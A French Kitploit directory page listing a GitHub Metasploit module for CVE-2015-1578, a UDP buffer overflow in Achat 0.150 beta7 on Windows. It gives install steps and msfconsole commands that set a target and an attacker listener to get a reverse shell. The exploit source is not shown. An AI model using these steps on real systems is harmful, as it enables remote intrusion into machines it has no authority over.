Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-1578-PoC-Metasploit — Ceci est un exploit de module Metasploit de preuve de concept pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sur Windows. L'exploitation conduit à une exécution de code à distance via un paquet UDP spécialement conçu. | Kitploit
Outils/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Frameworks de Tests d'IntrusionFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationShellcodeOutil d'Accès à DistanceGénération de ShellcodeDéveloppement de Charges UtilesExploitation de Binaires
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Ceci est un exploit de module Metasploit de preuve de concept pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sur Windows. L'exploitation conduit à une exécution de code à distance via un paquet UDP spécialement conçu.

Voir le dépôt
14il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Module Metasploit CVE-2015-1578

Aperçu

Ceci est un module Metasploit pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sur Windows. L'exploitation permet l'exécution de code à distance via un paquet UDP conçu.

Objectif

Ce module est conçu pour servir d'exemple propre, minimal et bien structuré du développement d'exploit Metasploit. Il démontre :

  • La génération dynamique de shellcode encodé en Unicode via msfvenom
  • L'injection manuelle de payload (en contournant l'encodeur de payload interne de Metasploit)
  • Un mécanisme de livraison simple basé sur UDP
  • L'intégration dans le framework Metasploit via le chargement de module personnalisé

Tutoriel vidéo

Tutoriel vidéo

Dépendances

  • Metasploit Framework
  • msfvenom dans votre
$PATH

Fonctionnalités

  • Utilise msfvenom pour générer un payload avec l'encodage x86/unicode_mixed et des caractères indésirables personnalisés
  • Évite le système d'encodage de payload intégré de Metasploit pour contourner les limitations de l'encodeur

Installation

root@kitploit:~
./install.sh

Ensuite, lancez Metasploit et exécutez :

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Options

  • RHOSTS – Adresse IP cible (obligatoire)
  • LHOST – Adresse IP locale pour le shell inverse (obligatoire)
  • LPORT – Port local pour le shell inverse (par défaut : 4444)
  • RPORT – Port UDP distant sur la cible (par défaut : 9256)

Exemple d'utilisation

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Cela va :

  • Générer un payload de shell inverse compatible Unicode avec msfvenom
  • L'injecter dans le tampon Achat vulnérable via UDP
  • Écouter le shell sur le LHOST:LPORT spécifié
Télécharger l’outil